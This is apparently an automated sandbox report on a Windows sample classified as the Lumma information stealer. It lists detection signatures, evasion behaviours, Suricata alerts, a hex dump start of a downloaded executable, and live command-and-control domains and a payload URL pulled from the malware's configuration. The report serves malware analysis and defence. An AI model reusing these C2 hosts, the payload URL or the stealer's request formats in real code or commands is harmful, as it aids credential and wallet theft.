Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1559964
MD5:370fc731525b5f7087a7de06e2de56e6
SHA1:1064c9d0fbbc6a762cf6d3c0639908952af2d3a3
SHA256:278ccd58931cdc130118295753d00791559ff374bd6629158c5cb8f7c38097be
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 3180 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 370FC731525B5F7087A7DE06E2DE56E6)
    • chrome.exe (PID: 5564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 5636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2500,i,13953253401504598883,18053136304032162563,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 7668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1972,i,11730012379210978219,17128229350723911199,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["peepburry828.sbs", "p3ar11fter.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs", "processhol.sbs"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2317125677.0000000001366000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2289658698.000000000134B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2317048532.000000000135A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2242304214.0000000001354000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 10 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T08:30:10.865397+010020283713Unknown Traffic192.168.2.649710188.114.96.3443TCP
              2024-11-21T08:30:13.197048+010020283713Unknown Traffic192.168.2.649711188.114.96.3443TCP
              2024-11-21T08:30:16.384304+010020283713Unknown Traffic192.168.2.649713188.114.96.3443TCP
              2024-11-21T08:30:18.708540+010020283713Unknown Traffic192.168.2.649719188.114.96.3443TCP
              2024-11-21T08:30:21.219848+010020283713Unknown Traffic192.168.2.649726188.114.96.3443TCP
              2024-11-21T08:30:23.727562+010020283713Unknown Traffic192.168.2.649731188.114.96.3443TCP
              2024-11-21T08:30:26.348661+010020283713Unknown Traffic192.168.2.649741188.114.96.3443TCP
              2024-11-21T08:30:32.236678+010020283713Unknown Traffic192.168.2.649756188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T08:30:11.557016+010020546531A Network Trojan was detected192.168.2.649710188.114.96.3443TCP
              2024-11-21T08:30:14.597333+010020546531A Network Trojan was detected192.168.2.649711188.114.96.3443TCP
              2024-11-21T08:30:32.955880+010020546531A Network Trojan was detected192.168.2.649756188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T08:30:11.557016+010020498361A Network Trojan was detected192.168.2.649710188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T08:30:14.597333+010020498121A Network Trojan was detected192.168.2.649711188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T08:30:10.865397+010020577311Domain Observed Used for C2 Detected192.168.2.649710188.114.96.3443TCP
              2024-11-21T08:30:13.197048+010020577311Domain Observed Used for C2 Detected192.168.2.649711188.114.96.3443TCP
              2024-11-21T08:30:16.384304+010020577311Domain Observed Used for C2 Detected192.168.2.649713188.114.96.3443TCP
              2024-11-21T08:30:18.708540+010020577311Domain Observed Used for C2 Detected192.168.2.649719188.114.96.3443TCP
              2024-11-21T08:30:21.219848+010020577311Domain Observed Used for C2 Detected192.168.2.649726188.114.96.3443TCP
              2024-11-21T08:30:23.727562+010020577311Domain Observed Used for C2 Detected192.168.2.649731188.114.96.3443TCP
              2024-11-21T08:30:26.348661+010020577311Domain Observed Used for C2 Detected192.168.2.649741188.114.96.3443TCP
              2024-11-21T08:30:32.236678+010020577311Domain Observed Used for C2 Detected192.168.2.649756188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T08:30:34.457787+010020197142Potentially Bad Traffic192.168.2.649762185.215.113.1680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T08:30:09.367357+010020577301Domain Observed Used for C2 Detected192.168.2.6610441.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T08:30:24.480662+010020480941Malware Command and Control Activity Detected192.168.2.649731188.114.96.3443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: https://cook-rain.sbs/apiEAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs:443/apiLocalAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/qnAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/apiQQAvira URL Cloud: Label: malware
              Source: http://185.215.113.16/TnAvira URL Cloud: Label: phishing
              Source: https://cook-rain.sbs/iAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/6n(Avira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/~nAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/roAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/&Avira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/-xAvira URL Cloud: Label: malware
              Source: http://185.215.113.16/off/def.exe4Avira URL Cloud: Label: phishing
              Source: https://cook-rain.sbs/)nAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/L#uAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/FnAvira URL Cloud: Label: malware
              Source: file.exe.3180.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["peepburry828.sbs", "p3ar11fter.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs", "processhol.sbs"], "Build id": "LOGS11--LiveTraffic"}
              Source: file.exeReversingLabs: Detection: 42%
              Source: file.exeJoe Sandbox ML: detected
              Source: 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString decryptor: p3ar11fter.sbs
              Source: 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString decryptor: 3xp3cts1aim.sbs
              Source: 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString decryptor: peepburry828.sbs
              Source: 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString decryptor: p10tgrace.sbs
              Source: 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString decryptor: processhol.sbs
              Source: 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49814 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49824 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49865 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49883 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49973 version: TLS 1.2
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000002.2620083357.0000000006282000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2496082408.00000000081E0000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PublishersJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\SolidDocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2057730 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) : 192.168.2.6:61044 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49713 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49719 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49741 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49710 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49731 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49756 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49711 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49726 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49731 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49756 -> 188.114.96.3:443
              Source: Malware configuration extractorURLs: peepburry828.sbs
              Source: Malware configuration extractorURLs: p3ar11fter.sbs
              Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
              Source: Malware configuration extractorURLs: p10tgrace.sbs
              Source: Malware configuration extractorURLs: processhol.sbs
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 07:30:34 GMTContent-Type: application/octet-streamContent-Length: 2786816Last-Modified: Thu, 21 Nov 2024 07:17:32 GMTConnection: keep-aliveETag: "673ede8c-2a8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 b4 92 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 61 75 72 73 6e 6d 66 00 40 2a 00 00 a0 00 00 00 24 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 70 65 76 6c 64 72 67 00 20 00 00 00 e0 2a 00 00 06 00 00 00 5e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 64 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewIP Address: 13.107.246.42 13.107.246.42
              Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49719 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49741 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49731 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49756 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49726 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49762 -> 185.215.113.16:80
              Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
              Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
